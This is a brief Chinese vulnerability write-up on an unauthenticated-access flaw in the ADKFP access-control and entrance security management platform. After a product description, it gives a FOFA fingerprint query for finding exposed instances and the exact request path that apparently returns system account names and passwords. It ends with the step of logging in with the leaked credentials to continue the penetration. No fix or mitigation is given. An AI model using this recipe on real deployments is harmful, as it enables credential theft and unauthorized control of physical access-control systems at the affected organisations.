费浦门禁出入口安防平台aDKManageUser存在未授权访问
一、漏洞简介
ADKFP门禁出入口综合安防管理平台,企业出入口系统采用两级运营管理方式,即“集中控制,分散管理”的方式实现企业管理中心和各企业合作运营的管理模式。 企业出入口系统的所有功能,都是以功能模块的形式提供。模块化的好处是能适应用户的需求,系统可任意搭配,互相配合,能够组合式适应用户需要,与用户的管理模式紧密结合。系统覆盖基础平台、身份信息平台、设备管理、门禁管理、考勤管理、访客管理、车辆门禁、电子门锁管理、移动端管理,智能办公模块包含智能迎宾、会议签到、布控抓拍、报警信息推送等多个应用子系统,所有子系统可实现信息共享,统一服务于整个企业出入口平台。 ADKFP门禁出入口综合安防管理平台存在接口未授权访问,可通过访问接口获取系统账号及密码,进而登录系统后台进行下一步渗透。
二、影响版本
- ADKFP门禁出入口综合安防管理平台
三、资产测绘
- fofa
body="/adkfp/getCode" - 特征
四、漏洞复现
/aDKManageUser/selectCll_2?roleId=2&page=1&limit=10
使用泄漏的账号密码登陆系统